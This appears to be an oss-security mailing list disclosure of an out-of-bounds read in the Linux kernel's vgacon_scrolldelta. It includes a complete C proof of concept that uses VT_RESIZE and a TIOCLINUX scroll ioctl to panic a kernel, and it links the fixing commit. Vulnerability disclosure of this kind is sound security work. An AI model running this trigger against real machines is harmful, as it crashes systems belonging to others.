Message-ID: <CA+-U7QDboXJEpHXNa5mk-pOyBbKw63t8WefV5cmr+Hi8KsWeOQ@mail.gmail.com>
Date: Wed, 16 Sep 2020 16:19:46 +0800
From: NopNop Nop <nopitydays@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux Kernel: out-of-bounds reading in vgacon_scrolldelta

Hi,

We found an out-of-bounds reading in vgacon_scrolldelta.
This BUG is caused by "soff" being negative after VT_RESIZE.

Our PoC (panic with CONFIG_KASAN=y):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int main(int argc, char** argv) {
    int fd = open("/dev/tty1", O_RDWR, 0);

    /* 0x5609 is VT_RESIZE */
    unsigned short size[3] = {4, 0x254, 0};
    ioctl(fd, 0x5609, size);

    for (int i = 0; i < 110; i++) {
        write(fd, "\x0a", 1);
    }

    /* 0x541c is TIOCLINUX; subcode 13 is TIOCL_SCROLLCONSOLE */
    signed int args[3] = {13, -0x400, 0};
    ioctl(fd, 0x541c, args);
}

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=973c096f6a85e5b5f2a295126ba6928d9a6afd45

Regards,
Nop